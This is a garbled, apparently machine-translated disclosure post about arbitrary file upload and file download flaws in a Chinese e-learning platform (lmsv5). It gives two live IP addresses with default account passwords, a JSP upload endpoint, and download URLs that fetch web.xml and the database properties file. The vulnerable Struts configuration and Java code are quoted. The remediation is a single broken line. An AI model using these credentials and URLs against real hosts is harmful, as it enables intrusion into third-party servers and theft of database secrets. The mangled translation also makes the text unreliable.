A general online learning management system has the Arbitrary File Upload and Arbitrary File Download Vulnerability.

Yesufida's e-Learning

There are arbitrary file uploads and arbitrary file downloads. However, a normal account can be used for Logon. Of course, we can use brute force cracking ...... If you do not have a verification code, You need to log on with a low-permission account first (no verification code is available, you have set a simple password, and you can simply drop the verification code by number)

It provides several default or simple passwords:

Http: // 58.214.233.113: 8800/lmsv5/

00041013/123456

00041014/123456

00041012/123456



Http: // 60.216.4.162: 9091/lmsv5/

107649/111111

107648/111111

107640/111111



File Upload

Http: // 60.216.4.162: 9091/lmsv5/uploadfile! LoginUploadFile. action? UploadFileType = jsp

View Source Code:

Another one:

Http: // 58.214.233.113: 8800/lmsv5/uploadfile! LoginUploadFile. action? UploadFileType = jsp

Arbitrary File Download

The official configuration is as follows:

 

<Action name = "downloadfile! * "Class =" cn.com. iactive. learn. res. upOrdownFile. FileDownloadAction "method =" {1} "> <! -- The Directory of the downloaded file. If not, the download is denied to ensure security, this is implemented in the action class --> <param name = "inputPath">/coursedir </param> <result name = "success" type = "stream"> <param name =" contentType "> application/octet-stream </param> <param name =" inputName "> inputStream </param> <! -- Obtain the file name dynamically --> <param name = "contentDisposition"> attachment; filename = "$ {fileName}" </param> <param name = "bufferSize"> 4096 </param> </result>

Tears flow.

Check the Code:

 

public InputStream getInputStream()    throws Exception  {    int size = this.url.length() - 1;    for (int i = 0; i < size; i++)      this.url = this.url.replace("\\", "/");    return ServletActionContext.getServletContext().getResourceAsStream(this.url);  }

What about directly using url parameters ...... No filtering at all.



Http: // 60.216.4.162: 9091/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/web. xml & fileName =/1.xml

Http: // 60.216.4.162: 9091/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/classes/dataBase. properties & fileName =/dataBase. properties

Another example:

Http: // 58.214.233.113: 8800/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/web. xml & fileName =/1.xml

Http: // 58.214.233.113: 8800/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/classes/dataBase. properties & fileName =/dataBase. properties

 

Solution:

File Upload: only restrictions are allowed.

File Download: Limits